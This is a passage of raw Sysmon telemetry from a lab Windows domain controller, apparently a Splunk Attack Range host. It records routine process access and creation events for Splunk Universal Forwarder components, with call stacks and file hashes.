16:08:07.289{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030430Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.289{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5567-6008-E206-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030429Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.289{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5567-6008-E206-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.290{7901BC46-5567-6008-E206-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5568-6008-E406-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030451Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030450Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030449Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030448Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030447Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-5568-6008-E406-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030446Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5568-6008-E406-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:08.633{7901BC46-5568-6008-E406-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030461Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.711{7901BC46-5569-6008-E506-00000000A301}55246812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.570{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5569-6008-E506-00000000A301}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.570{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.570{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.570{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.570{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.570{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5569-6008-E506-00000000A301}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.570{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5569-6008-E506-00000000A301}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:09.571{7901BC46-5569-6008-E506-00000000A301}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.242{7901BC46-556A-6008-E606-00000000A301}55287452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.101{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-556A-6008-E606-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.101{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.101{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-556A-6008-E606-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:10.101{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-556A-6008-E606-00000000A301}5528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 